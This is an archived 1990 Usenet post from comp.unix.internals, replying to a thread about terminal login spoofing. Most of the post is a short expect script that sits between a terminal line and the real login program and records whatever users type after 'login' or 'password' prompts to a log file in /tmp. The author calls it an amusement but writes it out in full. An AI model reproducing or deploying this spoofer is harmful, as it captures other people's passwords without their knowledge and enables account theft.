Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!sdd.hp.com!wuarchive!decwrl!uunet!cme!libes From: libes@cme.nist.gov (Don Libes) Newsgroups: comp.unix.internals Subject: Re: Finding Passwords Keywords: dont try this Message-ID: <7089@muffin.cme.nist.gov> Date: 9 Oct 90 00:16:28 GMT References: <8685@mirsa.inria.fr> <651@puck.mrcu> <52347@brunix.UUCP> <162@cutmcvax.OZ> Reply-To: libes@cme.nist.gov (Don Libes) Organization: National Institute of Standards and Technology Lines: 43 In article <162@cutmcvax.OZ> wemmp@cutmcvax.oz.au (Peter Wemm) writes: > What if the spoofer opens a tty/pty that just transfers characters > between master/slave and the process catches all data passing through > containing the lines 'login:' or 'password'. I think it can. That > way it could run a fake getty/REAL login or perhaps even both of the > real programs!! It would be indetectable except that if the user typed > 'tty' they would be on ttyp? instead of the normal line. Again, this > requires physical access to the terminal or line. Just a thought....... Here's a short expect script to do exactly this. Just thought you'd be amused. It connects the input and output of 'login' to a tty. Whenever it sees the strings "password" or "login" come from the login process, it begins recording everything up to the next output from the login process. set log /tmp/spoof.log spawn tip /dev/ttya ;# open a connection to tty to be spoofed set tty $spawn_id expect *connected* ;# throw away tip's "connected" msg spawn login ;# open a connection to a login process set login $spawn_id for {} 1 {} { set ready [select $tty $login] for {set i 0} {$i < [length $ready]} {set i [expr $i+1]} { set spawn_id [index $ready $i] if {$spawn_id == $login} { expect {*password* *login*} {log_file $log} \ eof {close $tty; exit} \ * {log_file} set spawn_id $tty } if {$spawn_id == $tty} { expect eof {close $login; exit} \ * set spawn_id $login } send $expect_match } }